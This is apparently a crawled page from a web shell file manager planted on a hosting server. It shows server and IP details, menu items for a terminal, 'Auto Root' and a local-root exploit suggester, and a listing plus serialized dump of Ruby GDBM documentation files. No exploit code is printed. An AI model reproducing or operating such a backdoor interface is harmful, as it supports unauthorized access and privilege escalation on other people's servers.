Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
GDBM /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d%3d-i.ri
301
B
-rw-r--r--
2023-07-26 17:26
%5b%5d-i.ri
247
B
-rw-r--r--
2023-07-26 17:26
cachesize%3d-i.ri
282
B
-rw-r--r--
2023-07-26 17:26
cdesc-GDBM.ri
3.6
KB
-rw-r--r--
2023-07-26 17:26
clear-i.ri
252
B
-rw-r--r--
2023-07-26 17:26
close-i.ri
241
B
-rw-r--r--
2023-07-26 17:26
closed%3f-i.ri
283
B
-rw-r--r--
2023-07-26 17:26
delete-i.ri
377
B
-rw-r--r--
2023-07-26 17:26
delete_if-i.ri
362
B
-rw-r--r--
2023-07-26 17:26
each-i.ri
346
B
-rw-r--r--
2023-07-26 17:26
each_key-i.ri
317
B
-rw-r--r--
2023-07-26 17:26
each_pair-i.ri
356
B
-rw-r--r--
2023-07-26 17:26
each_value-i.ri
341
B
-rw-r--r--
2023-07-26 17:26
empty%3f-i.ri
256
B
-rw-r--r--
2023-07-26 17:26
fastmode%3d-i.ri
530
B
-rw-r--r--
2023-07-26 17:26
fetch-i.ri
366
B
-rw-r--r--
2023-07-26 17:26
has_key%3f-i.ri
351
B
-rw-r--r--
2023-07-26 17:26
has_value%3f-i.ri
361
B
-rw-r--r--
2023-07-26 17:26
include%3f-i.ri
351
B
-rw-r--r--
2023-07-26 17:26
invert-i.ri
296
B
-rw-r--r--
2023-07-26 17:26
key%3f-i.ri
343
B
-rw-r--r--
2023-07-26 17:26
key-i.ri
341
B
-rw-r--r--
2023-07-26 17:26
keys-i.ri
250
B
-rw-r--r--
2023-07-26 17:26
length-i.ri
286
B
-rw-r--r--
2023-07-26 17:26
member%3f-i.ri
349
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
1.49
KB
-rw-r--r--
2023-07-26 17:26
open-c.ri
849
B
-rw-r--r--
2023-07-26 17:26
reject%21-i.ri
358
B
-rw-r--r--
2023-07-26 17:26
reject-i.ri
375
B
-rw-r--r--
2023-07-26 17:26
reorganize-i.ri
405
B
-rw-r--r--
2023-07-26 17:26
replace-i.ri
333
B
-rw-r--r--
2023-07-26 17:26
select-i.ri
334
B
-rw-r--r--
2023-07-26 17:26
shift-i.ri
363
B
-rw-r--r--
2023-07-26 17:26
size-i.ri
282
B
-rw-r--r--
2023-07-26 17:26
store-i.ri
305
B
-rw-r--r--
2023-07-26 17:26
sync-i.ri
553
B
-rw-r--r--
2023-07-26 17:26
syncmode%3d-i.ri
728
B
-rw-r--r--
2023-07-26 17:26
to_a-i.ri
270
B
-rw-r--r--
2023-07-26 17:26
to_hash-i.ri
276
B
-rw-r--r--
2023-07-26 17:26
update-i.ri
380
B
-rw-r--r--
2023-07-26 17:26
value%3f-i.ri
353
B
-rw-r--r--
2023-07-26 17:26
values-i.ri
258
B
-rw-r--r--
2023-07-26 17:26
values_at-i.ri
302
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI"new:EFI"GDBM::new;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"ICreates a new GDBM instance by opening a gdbm file named _filename_.;TI"IIf the file does not exist, a new file with file mode _mode_ will be;TI"2created. _flags_ may be one of the following:;To:RDoc::Markup::List: @type:BULLET:@items[ o:RDoc::Markup::ListItem:@label0; [o; ; [I"!*READER* - open as a reader;To;;0; [o; ; [I"!*WRITER* - open as a writer;To;;0; [o; ; [I"S*WRCREAT* - open as a writer; if the database does not exist, create a new one;To;;0; [o; ; [I"C*NEWDB* - open as a writer; overwrite any existing databases;To:RDoc::Markup::BlankLine o; ; [I"RThe values *WRITER*, *WRCREAT* and *NEWDB* may be combined with the following;TI"values by bitwise or:;To;;; ;[o;;0; [o; ; [I"M*SYNC* - cause all database operations to be synchronized to the disk;To;;0; [o; ; [I".*NOLOCK* - do not lock the database file;T@&o; ; [ I"OIf no _flags_ are specified, the GDBM object will try to open the database;TI"Efile as a writer and will create it if it does not already exist;TI"Q(cf. flag <tt>WRCREAT</tt>). If this fails (for instance, if another process;TI"Jhas already opened the database as a reader), it will try to open the;TI":database file as a reader (cf. flag <tt>READER</tt>).;T: @file0I"3GDBM.new(filename, mode = 0666, flags = nil) ;T0[ I"(p1, p2 = v2, p3 = v3);FI"ext/gdbm/gdbm.c;T